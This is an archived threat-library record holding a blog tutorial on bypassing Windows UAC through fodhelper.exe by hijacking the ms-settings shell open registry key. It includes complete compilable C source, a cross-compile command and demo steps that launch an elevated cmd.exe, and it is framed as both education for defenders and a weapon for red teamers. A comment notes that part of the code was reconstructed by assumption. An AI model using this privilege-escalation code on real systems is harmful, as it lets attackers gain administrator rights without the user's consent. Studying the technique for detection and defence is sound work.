{
	"id": "9afa9dfd-daba-4c39-bced-66c8dc8dd948",
	"created_at": "2026-04-06T00:11:25.088299Z",
	"updated_at": "2026-04-10T13:11:22.21718Z",
	"deleted_at": null,
	"sha1_hash": "5796dd3569e1493e1eea7472a0fb01b414955194",
	"title": "Malware AV/VM evasion - part 17: bypass UAC via fodhelper.exe. Simple C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1276190,
	"plain_text": "Malware AV/VM evasion - part 17: bypass UAC via fodhelper.exe.\r\nSimple C++ example.\r\nBy cocomelonc\r\nPublished: 2023-06-19 · Archived: 2026-04-02 12:08:58 UTC\r\n4 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hat hackers!\r\nThis post appeared as an intermediate result of one of my research projects, in which I am going to bypass the\r\nantivirus by depriving it of the right to scan. This is the result of my own research on the first step, one of the\r\ninteresting UAC bypass tricks: via fodhelper.exe with registry modification.\r\nregistry modification\r\nThe process of modifying a registry key has as its end objective the rerouting of an elevated program’s execution\r\nflow to a command that the attacker controls. The most common misuses of key values involve the manipulation of\r\nthe windir and systemroot environment variables, as well as shell open commands for particular file extensions\r\n(depending on the program that is being targeted):\r\nhttps://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\nPage 1 of 11\n\nHKCU\\\\Software\\\\Classes\\\\\u003ctargeted_extension\u003e\\\\shell\\\\open\\\\command (Default or DelegateExecute\r\nvalues)\r\nHKCU\\\\Environment\\\\windir\r\nHKCU\\\\Environment\\\\systemroot\r\nfodhelper.exe\r\nfodhelper.exe was introduced in Windows 10 to manage optional features like region-specific keyboard\r\nsettings. Its location is C:\\Windows\\System32\\fodhelper.exe and it is signed by Microsoft:\r\nWhen fodhelper.exe is started, Process Monitor begins capturing the process and discloses (among other things)\r\nall registry and filesystem read/write operations. The registry read accesses are among the most intriguing\r\nactivities, especially those where a specific key or value is not found. 
Because we do not require special\r\npermissions to modify entries, HKEY_CURRENT_USER registry keys are particularly useful for testing how a\r\nprogram’s behavior may change after the creation of a new registry key.\r\nfodhelper.exe searches for HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command. This key does not\r\nexist by default in Windows 10:\r\nSo, when malware launches fodhelper (as we know, a Windows binary that permits elevation without requiring\r\na UAC prompt) as a Medium integrity process, Windows automatically elevates fodhelper from a Medium to a\r\nHigh integrity process. The High integrity fodhelper then tries to open an ms-settings file using the file’s\r\ndefault handler. Since the malware with Medium integrity has commandeered this handler, the elevated\r\nfodhelper will execute the attacker’s command as a process with High integrity.\r\npractical example\r\nSo, let’s create a PoC for this logic. First of all, create the registry key and set its values - our registry modification\r\nstep:\r\nHKEY hkey;\r\nDWORD d;\r\nconst char* settings = \"Software\\\\Classes\\\\ms-settings\\\\Shell\\\\Open\\\\command\";\r\nconst char* cmd = \"cmd /c start C:\\\\Windows\\\\System32\\\\cmd.exe\"; // default program\r\nconst char* del = \"\";\r\n// attempt to open (or create) the key\r\nLSTATUS stat = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR)settings, 0, NULL, 0, KEY_WRITE, NULL, \u0026hkey, \u0026d);\r\nprintf(stat != ERROR_SUCCESS ? \"failed to open or create reg key\\n\" : \"successfully create reg key\\n\");\r\n// set the registry values (REG_SZ length includes the terminating null)\r\nstat = RegSetValueEx(hkey, \"\", 0, REG_SZ, (unsigned char*)cmd, strlen(cmd) + 1);\r\nprintf(stat != ERROR_SUCCESS ? \"failed to set reg value\\n\" : \"successfully set reg value\\n\");\r\nstat = RegSetValueEx(hkey, \"DelegateExecute\", 0, REG_SZ, (unsigned char*)del, strlen(del) + 1);\r\nprintf(stat != ERROR_SUCCESS ? 
\"failed to set reg value: DelegateExecute\\n\" : \"successfully set reg value: DelegateExecute\\n\");\r\n// close the key handle\r\nRegCloseKey(hkey);\r\nAs you can see, this just creates a new registry structure under HKCU:\\Software\\Classes\\ms-settings\\ to perform the UAC\r\nbypass.\r\nThen, start the elevated app:\r\n// start the fodhelper.exe program\r\nSHELLEXECUTEINFO sei = { sizeof(sei) };\r\nsei.lpVerb = \"runas\";\r\nsei.lpFile = \"C:\\\\Windows\\\\System32\\\\fodhelper.exe\";\r\nsei.hwnd = NULL;\r\nsei.nShow = SW_NORMAL;\r\nif (!ShellExecuteEx(\u0026sei)) {\r\n DWORD err = GetLastError();\r\n // error message tail truncated in the archived copy; completed as an assumption\r\n printf(err == ERROR_CANCELLED ? \"the user refused to allow privileges elevation.\\n\" : \"unexpected error! error code: %lu\\n\", err);\r\n} else {\r\n printf(\"successfully create process =^..^=\\n\");\r\n}\r\nreturn 0;\r\nThat’s all.\r\nThe full source code, hack.c, looks like this:\r\n/*\r\n * hack.c - bypass UAC via fodhelper.exe\r\n * (registry modifications). C++ implementation\r\n * @cocomelonc\r\n * https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main() {\r\n HKEY hkey;\r\n DWORD d;\r\n const char* settings = \"Software\\\\Classes\\\\ms-settings\\\\Shell\\\\Open\\\\command\";\r\n const char* cmd = \"cmd /c start C:\\\\Windows\\\\System32\\\\cmd.exe\"; // default program\r\n const char* del = \"\";\r\n // attempt to open (or create) the key\r\n LSTATUS stat = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR)settings, 0, NULL, 0, KEY_WRITE, NULL, \u0026hkey, \u0026d);\r\n printf(stat != ERROR_SUCCESS ? \"failed to open or create reg key\\n\" : \"successfully create reg key\\n\");\r\n // set the registry values (REG_SZ length includes the terminating null)\r\n stat = RegSetValueEx(hkey, \"\", 0, REG_SZ, (unsigned char*)cmd, strlen(cmd) + 1);\r\n printf(stat != ERROR_SUCCESS ? 
\"failed to set reg value\\n\" : \"successfully set reg value\\n\");\r\n stat = RegSetValueEx(hkey, \"DelegateExecute\", 0, REG_SZ, (unsigned char*)del, strlen(del) + 1);\r\n printf(stat != ERROR_SUCCESS ? \"failed to set reg value: DelegateExecute\\n\" : \"successfully set reg value: DelegateExecute\\n\");\r\n // close the key handle\r\n RegCloseKey(hkey);\r\n // start the fodhelper.exe program\r\n SHELLEXECUTEINFO sei = { sizeof(sei) };\r\n sei.lpVerb = \"runas\";\r\n sei.lpFile = \"C:\\\\Windows\\\\System32\\\\fodhelper.exe\";\r\n sei.hwnd = NULL;\r\n sei.nShow = SW_NORMAL;\r\n if (!ShellExecuteEx(\u0026sei)) {\r\n DWORD err = GetLastError();\r\n // error message tail truncated in the archived copy; completed as an assumption\r\n printf(err == ERROR_CANCELLED ? \"the user refused to allow privileges elevation.\\n\" : \"unexpected error! error code: %lu\\n\", err);\r\n } else {\r\n printf(\"successfully create process =^..^=\\n\");\r\n }\r\n return 0;\r\n}\r\ndemo\r\nLet’s see everything in action. First, check the registry:\r\nreg query \"HKCU\\Software\\Classes\\ms-settings\\Shell\\open\\command\"\r\nAlso, check our current privileges:\r\nCompile our hack.c PoC on the attacker’s machine:\r\nx86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sec\r\nThen, just run it on the victim’s machine (Windows 10 x64 1903 in my case):\r\nAs you can see, cmd.exe is launched. 
Check registry structure again:\r\nreg query \"HKCU\\Software\\Classes\\ms-settings\\Shell\\open\\command\"\r\nAs you can see, the registry has been successfully modified.\r\nCheck privileges in our launched cmd.exe session:\r\nThen, run Process Hacker with Administrator privileges:\r\nand check the properties of our cmd.exe:\r\nAs you can see, everything worked perfectly! =^..^=\r\nGlupteba malware leverages this method to first elevate from a Medium to a High integrity process, then from\r\nHigh to System integrity via Token Manipulation.\r\nI hope this post raises awareness among blue teamers of this interesting bypass technique, and adds a weapon to\r\nthe red teamers’ arsenal.\r\nMITRE ATT\u0026CK: Modify registry\r\nGlupteba\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and goodbye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html"
	],
	"report_names": [
		"malware-av-evasion-17.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434285,
	"ts_updated_at": 1775826682,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5796dd3569e1493e1eea7472a0fb01b414955194.pdf",
		"text": "https://archive.orkl.eu/5796dd3569e1493e1eea7472a0fb01b414955194.txt",
		"img": "https://archive.orkl.eu/5796dd3569e1493e1eea7472a0fb01b414955194.jpg"
	}
}